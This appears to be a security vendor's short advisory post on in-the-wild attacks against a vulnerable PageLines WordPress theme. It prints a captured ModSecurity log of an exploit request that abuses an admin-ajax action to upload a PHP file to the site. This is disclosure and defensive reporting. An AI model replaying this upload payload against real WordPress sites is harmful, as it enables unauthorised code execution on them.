Top

Attacks in Pagelines for WordPress themes

PageLines

Last few days we have seen very much attacks this old Pagelines WordPress theme vulnerability. Sucuri discovered Pagelines vulnerability on January 2015.

Technical Details

Any website using vulnerable version of the platform theme (<1.4.4) is risk Privilege Escalation and Remote Code Execution.

ModSecurity Audit log, Payload

[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 93.170.77.90 37930 127.0.0.1 80
--5367c063-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Connection: close, Te
Accept: */*
Te: trailers
Accept-language: en-US;q=0.8,en;q=0.6
Accept-encoding: gzip, deflate
Content-length: 398
Host: vsdysleksia.net
Content-type: multipart/form-data; boundary=xYzZY
Referer: https://malware.expert/

Here POST data:

--5367c063-C--
--xYzZY
Content-Disposition: form-data; name="page"

pagelines
--xYzZY
Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

< ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
--xYzZY
Content-Disposition: form-data; name="action"

pagelines_test_ajax
--xYzZY
Content-Disposition: form-data; name="settings_upload"

settings
--xYzZY--

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this vulnerability.

, , ,

Comments are closed.